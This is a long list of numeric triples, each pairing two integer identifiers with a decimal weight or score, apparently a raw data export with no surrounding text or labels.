(254, 36558, 0.93331),
(255, 36558, 0.93331),
(256, 36558, 0.93331),
(258, 36558, 0.93331),
(259, 36558, 0.93331),
(260, 36558, 0.93331),
(261, 36558, 0.93331),
(262, 36558, 0.93331),
(263, 36558, 0.93331),
(264, 36558, 0.93331),
(265, 36558, 0.93331),
(266, 36558, 0.93331),
(267, 36558, 0.93331),
(268, 36558, 0.93331),
(270, 36558, 0.93331),
(272, 36558, 0.93331),
(273, 36558, 0.93331),
(274, 36558, 0.93331),
(275, 36558, 0.93331),
(280, 36558, 0.93331),
(288, 36558, 0.93331),
(292, 36558, 0.93331),
(301, 36558, 0.93331),
(304, 36558, 0.93331),
(305, 36558, 0.93331),
(253, 36559, 0.88669),
(255, 36559, 0.88669),
(174, 36561, 1.07331),
(253, 36561, 1.07331),
(237, 36562, 1.00331),
(241, 36562, 1.00331),
(253, 36562, 1.00331),
(254, 36562, 1.00331),
(255, 36562, 1.00331),
(257, 36562, 1.00331),
(258, 36562, 1.00331),
(259, 36562, 1.00331),
(260, 36562, 1.00331),
(261, 36562, 1.00331),
(262, 36562, 1.00331),
(263, 36562, 1.00331),
(264, 36562, 1.00331),
(268, 36562, 1.00331),
(269, 36562, 1.00331),
(270, 36562, 1.00331),
(272, 36562, 1.00331),
(273, 36562, 1.00331),
(274, 36562, 1.00331),
(275, 36562, 1.00331),
(280, 36562, 1.00331),
(288, 36562, 1.00331),
(292, 36562, 1.00331),
(301, 36562, 1.00331),
(304, 36562, 1.00331),
(305, 36562, 1.00331),
(237, 36563, 1.09669),
(241, 36563, 1.09669),
(253, 36563, 1.09669),
(254, 36563, 1.09669),
(255, 36563, 1.09669),
(257, 36563, 1.09669),
(258, 36563, 1.09669),
(259, 36563, 1.09669),
(260, 36563, 1.09669),
(261, 36563, 1.09669),
(263, 36563, 1.09669),
(264, 36563, 1.09669),
(268, 36563, 1.09669),
(269, 36563, 1.09669),
(270, 36563, 1.09669),
(272, 36563, 1.09669),
(273, 36563, 1.09669),
(274, 36563, 1.09669),
(275, 36563, 1.09669),
(280, 36563, 1.09669),
(288, 36563, 1.09669),
(292, 36563, 1.09669),
(301, 36563, 1.09669),
(304, 36563, 1.09669),
(305, 36563, 1.09669),
(239, 36564, 0.23331),
(245, 36564, 0.23331),
(253, 36564, 0.23331),
(254, 36564, 0.23331),
(259, 36564, 0.23331),
(260, 36564, 0.23331),
(265, 36564, 0.23331),
(266, 36564, 0.23331),
(272, 36564, 0.23331),
(280, 36564, 0.23331),
(288, 36564, 0.23331),
(304, 36564, 0.23331),
(174, 36564, 0.46662),
(178, 36564, 0.46662),
(243, 36564, 0.46662),
(263, 36564, 0.46662),
(240, 36564, 0.93324),
(235, 50969, 0.95669),
(264, 50969, 0.95669),
(193, 64646, 0.98),
(257, 64646, 0.98),
(193, 64647, 1.05),
(257, 64647, 1.05),
(193, 64652, 0.93331),
(238, 64652, 0.93331),
(238, 64653, 0.23331),
(239, 64653, 0.23331),
(242, 64653, 0.23331),
(244, 64653, 0.23331),
(258, 64653, 0.23331),
(268, 64653, 0.23331),
(274, 64653, 0.23331),
(290, 64653, 0.23331),
(306, 64653, 0.23331),
(193, 64653, 0.46662),
(241, 64653, 0.46662),
(261, 64653, 0.93324),
(261, 64654, 0.91),
(193, 64654, 1.82),
(241, 64654, 1.82),
(193, 64664, 0.84),
(237, 64664, 0.84),
(242, 64664, 0.84),
(290, 64664, 0.84),
(174, 64672, 0.86331),
(193, 64672, 0.86331),
(240, 64672, 0.86331),
(263, 64672, 0.86331),
(306, 64672, 0.86331),
(264, 64672, 1.72662),
(238, 64676, 0.91),
(274, 64676, 0.91),
(193, 64676, 1.82),
(241, 64676, 1.82),
(193, 64677, 2.00662),
(241, 64677, 2.00662),
(178, 64682, 0.88669),
(193, 64682, 0.88669),
(237, 64682, 0.88669),
(246, 64682, 0.88669),
(257, 64682, 0.88669),
(265, 64682, 0.88669),
(266, 64682, 0.88669),
(306, 64682, 0.88669),
(193, 64691, 0.86331),
(237, 64691, 0.86331),
(262, 64691, 0.86331),
(263, 64691, 0.86331),
(267, 64691, 0.86331),
(288, 64691, 0.86331),
(290, 64691, 0.86331),
(306, 64691, 0.86331),
(246, 64697, 1.00331),
(193, 64697, 2.00662),
(237, 68472, 0.86331),
(245, 68472, 0.86331),
(254, 68472, 0.86331),
(237, 68473, 0.98),
(254, 68473, 0.98),
(237, 68485, 0.98),
(254, 68485, 0.98),
(257, 68485, 0.98),
(274, 68485, 1.96),
(237, 74427, 0.91),
(238, 74427, 0.91),
(274, 74427, 0.91),
(306, 74427, 0.91),
(254, 75610, 1.68),
(255, 75610, 1.68),
(254, 75611, 1.96),
(255, 75611, 1.96),
(168, 75615, 0.32669),
(242, 75615, 0.32669),
(246, 75615, 0.32669),
(254, 75615, 0.65338),
(255, 75615, 0.65338),
(262, 75615, 0.65338),
(263, 75615, 0.65338),
(254, 75616, 1.02669),
(255, 75616, 1.02669),
(254, 75618, 0.93331),
(255, 75618, 0.93331),
(254, 75619, 1.07331),
(255, 75619, 1.07331),
(254, 75620, 0.86331),
(262, 75620, 0.86331),
(242, 75624, 0.23331),
(243, 75624, 0.23331),
(254, 75624, 0.23331),
(256, 75624, 0.23331),
(269, 75624, 0.23331),
(290, 75624, 0.23331),
(239, 75624, 0.46662),
(240, 75624, 0.46662),
(261, 75624, 0.69993),
(239, 75625, 0.88669),
(242, 75625, 0.88669),
(254, 75625, 0.88669),
(254, 75627, 0.91),
(258, 75627, 0.91),
(261, 75627, 0.91),
(275, 75627, 0.91),
(242, 75631, 0.88669),
(254, 75631, 0.88669),
(242, 75633, 1.00331),
(254, 75633, 1.00331),
(256, 75633, 1.00331),
(254, 75636, 0.95669),
(264, 75636, 0.95669),
(254, 75638, 0.88669),
(257, 75638, 0.88669),
(290, 75638, 0.88669),
(267, 75638, 1.77338),
(254, 75640, 0.95669),
(240, 75640, 2.87007),
(236, 77735, 0.95669),
(240, 77735, 0.95669),
(178, 77739, 0.81669),
(236, 77739, 0.81669),
(288, 77739, 0.81669),
(236, 77741, 0.84),
(249, 77741, 0.84),
(258, 77741, 0.84),
(269, 77741, 0.84),
(236, 77742, 0.91),
(258, 77742, 0.91),
(236, 77743, 0.86331),
(243, 77743, 0.86331),
(236, 77744, 0.91),
(243, 77744, 0.91),
(236, 77751, 0.93331),
(257, 77751, 0.93331),
(236, 77760, 0.14),
(263, 77760, 0.14),
(274, 77760, 0.14),
(292, 77760, 0.28),
(306, 77760, 0.28),
(236, 77761, 0.84),
(274, 77761, 0.84),
(237, 84646, 0.81669),
(243, 84646, 0.81669),
(304, 84646, 0.81669),
(237, 84652, 0.84),
(257, 84652, 0.84),
(262, 84652, 0.84),
(274, 84652, 0.84),
(288, 84652, 0.84),
(237, 84657, 1.00331),
(243, 84657, 1.00331),
(237, 84659, 0.98),
(263, 84659, 0.98),
(239, 90723, 0.95669),
(255, 90723, 0.95669),
(238, 92152, 0.14),
(246, 92152, 0.14),
(178, 92152, 0.42),
(238, 92153, 0.81669),
(246, 92153, 0.81669),
(268, 92155, 0.28),
(238, 92155, 0.56),
(238, 92160, 0.32669),
(304, 92160, 0.32669),
(174, 92160, 1.30676),
(178, 92167, 0.98),
(238, 92167, 0.98),
(243, 92167, 0.98),
(258, 92168, 0.84),
(238, 92168, 1.68),
(292, 92168, 1.68),
(243, 92183, 0.86331),
(267, 92183, 0.86331),
(238, 92183, 1.72662),
(265, 92183, 1.72662),
(266, 92183, 1.72662),
(269, 92188, 0.23331),
(292, 92188, 0.23331),
(238, 92188, 0.46662),
(239, 100386, 0.46669),
(274, 100386, 0.46669),
(288, 100386, 0.46669),
(239, 100390, 0.88669),
(240, 100390, 0.88669),
(256, 100390, 0.88669),
(269, 100390, 0.88669),
(239, 100391, 0.95669),
(256, 100391, 0.95669),
(269, 100391, 0.95669),
(239, 100393, 0.91),
(242, 100393, 0.91),
(239, 100398, 0.98),
(246, 100398, 0.98),
(239, 100401, 0.95669),
(257, 100401, 0.95669),
(239, 100409, 1.00331),
(259, 100409, 1.00331),
(260, 100409, 1.00331),
(265, 100409, 1.00331),
(266, 100409, 1.00331),
(240, 100412, 0.91),
(239, 100412, 1.82),
(242, 101974, 0.98),
(265, 101974, 0.98),
(266, 101974, 0.98),
(255, 101974, 4.9),
(255, 101975, 0.93331),
(262, 101975, 0.93331),
(269, 101975, 0.93331),
(243, 101975, 1.86662),
(306, 101975, 1.86662),
(255, 101976, 1.00331),
(241, 101976, 2.00662),
(241, 101977, 0.91),
(255, 101977, 0.91),
(258, 101977, 0.91),
(306, 101977, 0.91),
(242, 101977, 1.82),
(261, 101977, 1.82),
(290, 101977, 1.82),
(292, 101977, 1.82),
(241, 101978, 1.00331),
(255, 101978, 1.00331),
(258, 101978, 1.00331),
(292, 101978, 1.00331),
(241, 101980, 1.00331),
(255, 101980, 1.00331),
(243, 101981, 0.93331),
(255, 101981, 0.93331),
(258, 101981, 0.93331),
(270, 101981, 1.86662),
(301, 101981, 1.86662),
(240, 110204, 0.86331),
(257, 110204, 0.86331),
(257, 110212, 0.88669),
(262, 110212, 0.88669),
(257, 110221, 1.00331),
(267, 110221, 1.00331),
(245, 110222, 1.02669),
(257, 110222, 1.02669),
(241, 115155, 0.86331),
(256, 115155, 0.86331),
(263, 115161, 0.32669),
(256, 115161, 0.98007),
(240, 117629, 0.88669),
(240, 147300, 0.91),
(261, 147300, 0.91),
(174, 147306, 0.93331),
(240, 147306, 0.93331),
(262, 147306, 0.93331),
(240, 147307, 1.02669),
(262, 147307, 1.02669),
(270, 147313, 1.02669),
(301, 147313, 1.02669),
(240, 147313, 2.05338),
(243, 147317, 0.93331),
(264, 147317, 0.93331),
(265, 147317, 0.93331),
(266, 147317, 0.93331),
(240, 147317, 1.86662),
(248, 147317, 1.86662),
(262, 147317, 3.73324),
(240, 147324, 0.91),
(244, 147324, 3.12),
(240, 147330, 0.91),
(263, 147330, 0.91),
(243, 157266, 0.28),
(275, 157266, 0.28),
(243, 157269, 0.14),
(305, 157269, 0.14),
(168, 157269, 0.84),
(178, 157269, 1.54),
(168, 157270, 0.81669),
(243, 157270, 0.81669),
(243, 157280, 0.86331),
(274, 157280, 0.86331),
(174, 157282, 0.86331),
(243, 157282, 0.86331),
(306, 157282, 0.86331),
(243, 157291, 1.02669),
(270, 157291, 1.02669),
(301, 157291, 1.02669),
(243, 157296, 1.02669),
(248, 157296, 1.02669),
(265, 157296, 1.02669),
(266, 157296, 1.02669),
(241, 159248, 0.88669),
(268, 159248, 0.88669),
(275, 159260, 0.86331),
(241, 159260, 1.72662),
(174, 163215, 0.81669),
(258, 163215, 0.81669),
(174, 163216, 0.91),
(258, 163216, 0.91),
(258, 163218, 1.00331),
(265, 163218, 1.00331),
(266, 163218, 1.00331),
(258, 163221, 0.88669),
(261, 163221, 0.88669),
(258, 163222, 0.95669),
(261, 163222, 0.95669),
(258, 163233, 0.46669),
(267, 163233, 0.46669),
(244, 167368, 0.86331),
(259, 167368, 0.86331),
(260, 167368, 0.86331),
(242, 168841, 0.88669),
(268, 168841, 0.88669),
(242, 168870, 1.91338),
(261, 168870, 1.91338),
(242, 168883, 0.93331),
(267, 168883, 0.93331),
(244, 168884, 0.88669),
(242, 168884, 1.77338),
(306, 168884, 1.77338),
(242, 168909, 0.88669),
(275, 168909, 0.88669),
(269, 168911, 0.91),
(306, 168911, 0.91),
(242, 168911, 1.82),
(242, 168924, 0.18669),
(244, 168924, 0.18669),
(263, 168924, 0.18669),
(269, 168924, 0.18669),
(174, 173500, 0.86331),
(245, 173500, 0.86331),
(259, 173500, 0.86331),
(260, 173500, 0.86331),
(264, 173500, 0.86331),
(288, 173500, 0.86331),
(259, 173501, 0.98),
(260, 173501, 0.98),
(288, 173501, 0.98),
(249, 173502, 0.84),
(259, 173502, 0.84),
(260, 173502, 0.84),
(259, 173503, 0.93331),
(260, 173503, 0.93331),
(259, 173504, 0.95669),
(260, 173504, 0.95669),
(259, 173505, 1.02669),
(260, 173505, 1.02669),
(259, 173506, 1.09669),
(260, 173506, 1.09669),
(259, 173507, 0.86331),
(260, 173507, 0.86331),
(259, 173508, 0.98),
(260, 173508, 0.98),
(259, 173509, 0.95669),
(260, 173509, 0.95669),
(259, 173510, 1.19),
(260, 173510, 1.19),
(259, 173511, 0.98),
(260, 173511, 0.98),
(259, 173512, 1.09669),
(260, 173512, 1.09669),
(259, 173513, 0.88669),
(260, 173513, 0.88669),
(259, 173514, 1.05),
(260, 173514, 1.05),
(259, 173515, 0.88669),
(260, 173515, 0.88669),
(259, 173516, 0.95669),
(260, 173516, 0.95669),
(248, 175701, 0.18669),
(261, 175701, 0.18669),
(275, 175701, 0.18669),
(268, 175701, 0.37338),
(261, 175702, 0.88669),
(268, 175702, 0.88669),
(174, 175708, 0.91),
(261, 175708, 0.91),
(261, 175725, 0.88669),
(290, 175725, 0.88669),
(292, 175725, 0.88669),
(306, 175725, 0.88669),
(247, 175725, 1.77338),
(261, 175726, 0.98),
(290, 175726, 0.98),
(292, 175726, 0.98),
(306, 175726, 0.98),
(247, 175726, 1.96),
(261, 175728, 0.84),
(262, 175728, 0.84),
(288, 175728, 0.84),
(290, 175728, 0.84),
(244, 176706, 0.88669),
(273, 176706, 0.88669),
(244, 176707, 0.98),
(273, 176707, 0.98),
(244, 176724, 0.93331),
(262, 176724, 0.93331),
(272, 176724, 0.93331),
(280, 176724, 0.93331),
(174, 176724, 1.86662),
(244, 176725, 1.02669),
(272, 176725, 1.02669),
(280, 176725, 1.02669),
(174, 176725, 2.05338),
(245, 178652, 0.18669),
(249, 178652, 0.37338),
(161, 189527, 0.88669),
(161, 189528, 1.05),
(161, 189529, 0.28),
(161, 189530, 0.93331),
(161, 189531, 1.07331),
(161, 189532, 0.84),
(161, 189533, 1.00331),
(161, 189534, 1.16669),
(161, 189535, 0.98),
(161, 189536, 1.14331),
(161, 189537, 0.93331),
(161, 189538, 1.21331),
(193, 190973, 0.84),
(265, 190973, 0.84),
(266, 190973, 0.84),
(267, 190973, 0.84),
(174, 190987, 0.88669),
(193, 190987, 0.88669),
(178, 190989, 0.86331),
(193, 190989, 0.86331),
(273, 190989, 0.86331),
(178, 191017, 0.23331),
(193, 191017, 0.23331),
(306, 191017, 0.23331),
(168, 197829, 0.84),
(168, 197830, 0.93331),
(168, 197831, 0.84),
(168, 197832, 0.98),
(168, 197833, 0.88669),
(168, 197834, 0.84),
(168, 197835, 1.02669),
(168, 197836, 0.81669),
(178, 197836, 0.81669),
(168, 197837, 0.86331),
(168, 197838, 0.81669),
(178, 197838, 1.63338),
(168, 197839, 0.95669),
(168, 197840, 1.02669),
(168, 197841, 1.09669),
(168, 197842, 0.91),
(168, 197843, 1.00331),
(263, 197844, 0.95669),
(168, 197844, 1.91338),
(168, 197845, 1.07331),
(168, 197846, 0.93331),
(168, 197847, 0.91),
(168, 197848, 0.91),
(168, 197849, 0.98),
(168, 197850, 1.02669),
(168, 197851, 0.95669),
(168, 197852, 0.98),
(168, 197853, 0.95669),
(168, 197854, 0.95669),
(168, 197855, 1.00331),
(168, 197856, 1.00331),
(168, 197857, 0.51331),
(168, 197858, 1.14331),
(168, 197859, 1.19),
(168, 197860, 0.56),
(168, 197861, 1.14331),
(168, 197862, 1.28331),
(168, 197863, 0.86331),
(168, 197864, 0.95669),
(168, 197865, 0.88669),
(272, 197865, 0.88669),
(280, 197865, 0.88669),
(168, 197866, 1.07331),
(168, 197867, 0.91),
(168, 197868, 0.98),
(168, 197869, 0.32669),
(168, 197870, 1.02669),
(168, 197871, 1.14331),
(168, 197872, 0.32669),
(174, 197872, 0.32669),
(168, 197873, 0.98),
(168, 197874, 1.07331),
(174, 215339, 1.86662),
(174, 215340, 2.1),
(174, 215341, 0.93331),
(174, 215342, 1.00331),
(174, 215343, 0.93331),
(174, 215344, 1.00331),
(174, 215345, 1.00331),
(174, 215346, 0.91),
(174, 215347, 1.16669),
(174, 215348, 0.98),
(306, 215348, 0.98),
(174, 215349, 0.88669),
(174, 215350, 0.98),
(174, 215351, 1.12),
(174, 215352, 0.98),
(174, 215353, 1.05),
(174, 215354, 0.95669),
(174, 215355, 1.00331),
(174, 215356, 1.14331),
(174, 215357, 0.37331),
(174, 215358, 0.98),
(174, 215359, 1.05),
(174, 215360, 1.07331),
(174, 215361, 1.35331),
(174, 215362, 1.00331),
(174, 215363, 1.12),
(174, 215364, 0.86331),
(174, 215365, 0.95669),
(174, 215366, 2.1),
(174, 215367, 2.33338),
(275, 215368, 0.37331),
(288, 215368, 0.37331),
(174, 215368, 0.74662),
(174, 215369, 1.00331),
(174, 215370, 1.09669),
(174, 215371, 1.16669),
(174, 215372, 1.26),
(174, 215373, 0.23331),
(174, 215374, 0.95669),
(174, 215375, 1.14331),
(174, 215376, 0.86331),
(306, 215376, 0.86331),
(174, 215377, 1.05),
(174, 215378, 0.93331),
(174, 215379, 1.00331),
(178, 221835, 0.81669),
(178, 221836, 0.88669),
(178, 221837, 1.63338),
(178, 221838, 0.88669),
(178, 221839, 0.88669),
(178, 221840, 0.84),
(178, 221841, 0.88669),
(178, 221842, 0.84),
(178, 221843, 0.91),
(178, 221844, 0.84),
(178, 221845, 0.91),
(178, 221846, 0.88669),
(178, 221847, 1.68),
(178, 221848, 0.91),
(178, 221849, 0.88669),
(178, 221850, 2.52),
(178, 221851, 1.02669),
(178, 221852, 0.93331),
(178, 221853, 0.93331),
(178, 221854, 0.86331),
(178, 221855, 0.88669),
(178, 221856, 0.88669),
(178, 221857, 1.00331),
(178, 221858, 0.91),
(178, 221859, 1.02669),
(178, 221860, 0.93331),
(178, 221861, 1.05),
(178, 221862, 0.86331),
(178, 221863, 1.00331),
(178, 221864, 0.93331),
(178, 221865, 0.91),
(178, 221866, 0.91),
(178, 221867, 1.14331),
(178, 221868, 1.12),
(178, 221869, 1.09669),
(178, 221870, 0.95669),
(275, 221870, 0.95669),
(178, 221871, 1.16669),
(178, 221872, 0.95669),
(178, 221873, 1.07331),
(178, 221874, 1.02669),
(178, 221875, 1.21331),
(178, 221876, 0.56),
(178, 221877, 1.96),
(178, 221878, 1.02669),
(178, 221879, 1.07331),
(178, 221880, 0.23331),
(178, 221881, 0.88669),
(178, 221882, 0.98),
(178, 221883, 0.88669),
(178, 221884, 0.98),
(178, 221885, 0.28),
(178, 221886, 0.88669),
(178, 221887, 1.07331),
(178, 221888, 0.88669),
(178, 221889, 0.98),
(178, 221890, 1.00331),
(178, 221891, 1.09669),
(178, 221892, 0.32669),
(178, 221893, 1.07331),
(178, 221894, 1.16669),
(178, 221895, 1.05),
(178, 221896, 1.12),
(263, 227450, 0.98),
(264, 227450, 0.98),
(247, 228978, 0.93331),
(248, 228978, 0.93331),
(264, 231947, 0.98),
(265, 231947, 0.98),
(266, 231947, 0.98),
(193, 238691, 0.81669),
(268, 238691, 0.81669),
(193, 238692, 0.93331),
(193, 238693, 0.91),
(193, 238694, 1.00331),
(193, 238695, 0.86331),
(193, 238696, 1.00331),
(193, 238697, 0.95669),
(193, 238698, 0.98),
(193, 238699, 0.56),
(193, 238700, 1.02669),
(193, 238701, 1.12),
(193, 238702, 1.02669),
(193, 238703, 1.09669),
(193, 238704, 0.81669),
(193, 238705, 0.88669),
(193, 238706, 0.93331),
(193, 238707, 0.81669),
(193, 238708, 0.95669),
(193, 238709, 0.93331),
(193, 238710, 1.02669),
(193, 238711, 1.09669),
(193, 238712, 1.02669),
(193, 238713, 0.88669),
(193, 238714, 0.98),
(193, 238715, 1.09669),
(193, 238716, 0.91),
(193, 238717, 1.09669),
(193, 238718, 0.88669),
(193, 238719, 0.98),
(193, 238720, 0.98),
(193, 238721, 1.00331),
(193, 238722, 0.95669),
(193, 238723, 1.00331),
(193, 238724, 1.00331),
(193, 238725, 0.95669),
(193, 238726, 1.02669),
(193, 238727, 1.02669),
(193, 238728, 1.14331),
(193, 238729, 1.09669),
(193, 238730, 1.19),
(193, 238731, 1.09669),
(193, 238732, 1.07331),
(193, 238733, 0.98),
(193, 238734, 1.16669),
(193, 238735, 0.23331),
(193, 238736, 0.95669),
(193, 238737, 1.05),
(193, 238738, 0.95669),
(193, 238739, 1.05),
(193, 238740, 2.1),
(193, 238741, 0.98),
(193, 238742, 1.23669),
(193, 238743, 0.98),
(193, 238744, 1.05),
(193, 238745, 1.02669),
(193, 238746, 1.23669),
(193, 238747, 1.07331),
(193, 238748, 1.16669),
(193, 238749, 1.05),
(193, 238750, 1.14331),
(193, 238751, 0.95669),
(193, 238752, 1.05),
(270, 250500, 0.98),
(301, 250500, 0.98),
(270, 250501, 1.07331),
(301, 250501, 1.07331),
(270, 250502, 0.91),
(301, 250502, 0.91),
(270, 250503, 0.88669),
(301, 250503, 0.88669),
(270, 250504, 1.02669),
(301, 250504, 1.02669),
(270, 250505, 1.05),
(301, 250505, 1.05),
(270, 250506, 1.00331),
(301, 250506, 1.00331),
(270, 250507, 1.12),
(301, 250507, 1.12),
(265, 251088, 0.86331),
(266, 251088, 0.86331),
(265, 251089, 1.00331),
(266, 251089, 1.00331),
(265, 251090, 0.88669),
(266, 251090, 0.88669),
(265, 251091, 0.93331),
(266, 251091, 0.93331),
(265, 251092, 0.95669),
(266, 251092, 0.95669),
(265, 251093, 0.95669),
(266, 251093, 0.95669),
(306, 251093, 0.95669),
(265, 251094, 1.07331),
(266, 251094, 1.07331),
(265, 251095, 0.98),
(266, 251095, 0.98),
(265, 251096, 1.12),
(266, 251096, 1.12),
(265, 251097, 1.07331),
(266, 251097, 1.07331),
(265, 251098, 1.07331),
(266, 251098, 1.07331),
(304, 251098, 1.07331),
(274, 251098, 8.73981),
(265, 251099, 0.98),
(266, 251099, 0.98),
(265, 251100, 1.02669),
(266, 251100, 1.02669),
(265, 251101, 1.96),
(266, 251101, 1.96),
(265, 251102, 1.12),
(266, 251102, 1.12),
(265, 251103, 1.21331),
(266, 251103, 1.21331),
(265, 251104, 1.00331),
(266, 251104, 1.00331),
(265, 251105, 1.14331),
(266, 251105, 1.14331),
(265, 251106, 1.14331),
(266, 251106, 1.14331),
(265, 251107, 0.98),
(266, 251107, 0.98),
(265, 251108, 1.09669),
(266, 251108, 1.09669),
(265, 251109, 1.00331),
(266, 251109, 1.00331),
(272, 253282, 1.05),
(280, 253282, 1.05),
(272, 253283, 1.12),
(280, 253283, 1.12),
(272, 253284, 0.98),
(280, 253284, 0.98),
(272, 253285, 0.86331),
(280, 253285, 0.86331),
(275, 253285, 7.89312),
(272, 253286, 0.98),
(280, 253286, 0.98),
(272, 253287, 1.02669),
(280, 253287, 1.02669),
(272, 253288, 1.14331),
(280, 253288, 1.14331),
(273, 256228, 0.91),
(273, 256229, 0.95669),
(273, 256230, 0.88669),
(273, 256231, 1.07331),
(273, 256232, 0.98),
(233, 266489, 0.51331),
(233, 266490, 1.07331),
(233, 266491, 1.16669),
(233, 266492, 1.02669),
(233, 266493, 1.23669),
(233, 266494, 1.05),
(233, 266495, 1.12),
(233, 266496, 0.86331),
(233, 266497, 0.91),
(233, 266498, 1.12),
(233, 266499, 1.19),
(233, 266500, 1.14331),
(233, 266501, 2.14662),
(233, 266502, 0.88669),
(233, 266503, 1.02669),
(233, 266504, 0.93331),
(233, 266505, 1.07331),
(233, 266506, 1.00331),
(233, 266507, 1.09669),
(233, 266508, 0.91),
(305, 266508, 0.91),
(233, 266509, 1.05),
(233, 266510, 0.81669),
(233, 266511, 1.00331),
(233, 266512, 0.98),
(304, 266512, 0.98),
(306, 266512, 0.98),
(233, 266513, 0.98),
(233, 266514, 1.09669),
(233, 266515, 1.00331),
(235, 267624, 1.05),
(235, 267625, 1.14331),
(235, 267626, 1.05),
(235, 267627, 1.14331),
(235, 267628, 0.88669),
(235, 267629, 0.95669),
(235, 267630, 0.93331),
(235, 267631, 1.05),
(235, 267632, 1.09669),
(235, 267633, 0.42),
(305, 267633, 0.42),
(235, 267634, 0.95669),
(235, 267635, 1.07331),
(236, 268782, 0.42),
(236, 268783, 0.95669),
(236, 268784, 1.09669),
(236, 268785, 0.95669),
(304, 268785, 0.95669),
(236, 268786, 1.02669),
(304, 268786, 1.02669),
(236, 268787, 1.07331),
(236, 268788, 1.19),
(236, 268789, 0.91),
(236, 268790, 1.00331),
(236, 268791, 0.98),
(236, 268792, 1.09669),
(236, 268793, 1.00331),
(236, 268794, 1.12),
(236, 268795, 1.16669),
(236, 268796, 0.95669),
(236, 268797, 1.05),
(236, 268798, 0.91),
(236, 268799, 0.91),
(236, 268800, 1.02669),
(236, 268801, 0.84),
(236, 268802, 2.00662),
(236, 268803, 1.19),
(236, 268804, 1.12),
(236, 268805, 1.09669),
(236, 268806, 0.98),
(236, 268807, 1.14331),
(236, 268808, 0.98),
(236, 268809, 1.05),
(236, 268810, 0.93331),
(236, 268811, 1.12),
(236, 268812, 1.05),
(236, 268813, 1.07331),
(236, 268814, 0.23331),
(236, 268815, 0.86331),
(236, 268816, 0.95669),
(237, 269601, 0.86331),
(237, 269602, 1.00331),
(237, 269603, 0.93331),
(237, 269604, 1.96),
(237, 269605, 1.07331),
(237, 269606, 1.14331),
(237, 269607, 0.93331),
(237, 269608, 1.07331),
(237, 269609, 0.88669),
(290, 269609, 1.77338),
(237, 269610, 0.95669),
(237, 269611, 0.98),
(237, 269612, 1.07331),
(237, 269613, 1.00331),
(237, 269614, 1.09669),
(237, 269615, 0.93331),
(237, 269616, 1.07331),
(237, 269617, 0.93331),
(304, 269617, 0.93331),
(237, 269618, 1.02669),
(238, 270931, 0.95669),
(238, 270932, 0.93331),
(238, 270933, 1.00331),
(238, 270934, 0.98),
(238, 270935, 1.05),
(238, 270936, 0.93331),
(304, 270936, 0.93331),
(238, 270937, 1.14331),
(238, 270938, 0.93331),
(238, 270939, 1.00331),
(238, 270940, 0.88669),
(238, 270941, 1.05),
(238, 270942, 1.02669),
(238, 270943, 0.93331),
(238, 270944, 0.93331),
(238, 270945, 1.00331),
(238, 270946, 0.93331),
(238, 270947, 1.00331),
(238, 270948, 0.98),
(238, 270949, 1.00331),
(238, 270950, 1.02669),
(292, 270950, 1.02669),
(238, 270951, 0.93331),
(238, 270952, 1.00331),
(238, 270953, 0.95669),
(238, 270954, 1.26),
(238, 270955, 0.98),
(238, 270956, 1.00331),
(238, 270957, 1.09669),
(238, 270958, 1.00331),
(238, 270959, 1.12),
(238, 270960, 1.00331),
(238, 270961, 1.09669),
(238, 270962, 0.91),
(238, 270963, 1.09669),
(239, 272949, 0.18669),
(239, 272950, 0.91),
(239, 272951, 1.02669),
(239, 272952, 0.32669),
(239, 272953, 1.12),
(239, 272954, 1.21331),
(239, 272955, 1.05),
(239, 272956, 1.14331),
(239, 272957, 1.09669),
(239, 272958, 0.98),
(239, 272959, 1.02669),
(239, 272960, 0.37331),
(239, 272961, 1.05),
(239, 272962, 1.09669),
(239, 272963, 0.98),
(239, 272964, 1.05),
(239, 272965, 0.93331),
(239, 272966, 1.02669),
(239, 272967, 0.98),
(239, 272968, 1.05),
(239, 272969, 0.88669),
(239, 272970, 1.14331),
(239, 272971, 1.09669),
(239, 272972, 1.19),
(239, 272973, 1.26),
(239, 272974, 1.14331),
(239, 272975, 0.98),
(239, 272976, 1.00331),
(239, 272977, 1.07331),
(239, 272978, 0.23331),
(239, 272979, 0.88669),
(239, 272980, 0.98),
(239, 272981, 0.93331),
(239, 272982, 1.00331),
(239, 272983, 0.91),
(239, 272984, 1.00331),
(239, 272985, 0.23331),
(239, 272986, 0.91),
(239, 272987, 1.12),
(240, 275097, 1.07331),
(240, 275098, 0.88669),
(240, 275099, 1.07331),
(240, 275100, 0.91),
(240, 275101, 1.00331),
(240, 275102, 1.09669),
(240, 275103, 0.98),
(240, 275104, 0.98),
(240, 275105, 0.79331),
(240, 275106, 0.95669),
(240, 275107, 1.00331),
(240, 275108, 1.02669),
(240, 275109, 0.93331),
(240, 275110, 0.86331),
(306, 275110, 0.86331),
(240, 275111, 1.05),
(240, 275112, 0.91),
(240, 275113, 1.07331),
(240, 275114, 1.02669),
(240, 275115, 1.02669),
(240, 275116, 1.12),
(240, 275117, 1.07331),
(240, 275118, 1.21331),
(240, 275119, 1.02669),
(240, 275120, 1.30669),
(240, 275121, 1.05),
(240, 275122, 0.98),
(240, 275123, 1.02669),
(240, 275124, 1.14331),
(240, 275125, 1.02669),
(240, 275126, 0.98),
(240, 275127, 0.98),
(240, 275128, 1.14331),
(241, 276828, 0.93331),
(241, 276829, 0.93331),
(241, 276830, 1.05),
(241, 276831, 0.95669),
(241, 276832, 0.98),
(241, 276833, 1.00331),
(241, 276834, 0.91),
(241, 276835, 1.00331),
(241, 276836, 0.88669),
(241, 276837, 0.98),
(241, 276838, 0.93331),
(241, 276839, 0.93331),
(241, 276840, 0.98),
(241, 276841, 1.77338),
(241, 276842, 0.98),
(241, 276843, 0.98),
(241, 276844, 0.81669),
(241, 276845, 0.91),
(241, 276846, 0.93331),
(241, 276847, 1.00331),
(241, 276848, 0.86331),
(241, 276849, 1.00331),
(241, 276850, 0.88669),
(241, 276851, 1.00331),
(241, 276852, 1.00331),
(241, 276853, 1.00331),
(241, 276854, 1.00331),
(306, 276854, 1.00331),
(241, 276855, 0.28),
(241, 276856, 0.93331),
(241, 276857, 1.02669),
(242, 278208, 0.88669),
(242, 278209, 1.00331),
(242, 278210, 1.12),
(242, 278211, 1.26),
(242, 278212, 1.02669),
(242, 278213, 1.00331),
(242, 278214, 1.05),
(242, 278215, 0.32669),
(242, 278216, 0.95669),
(242, 278217, 1.07331),
(242, 278218, 1.16669),
(242, 278219, 1.26),
(242, 278220, 1.16669),
(242, 278221, 1.23669),
(242, 278222, 1.82),
(242, 278223, 1.16669),
(242, 278224, 1.05),
(242, 278225, 0.88669),
(242, 278226, 0.98),
(242, 278227, 0.84),
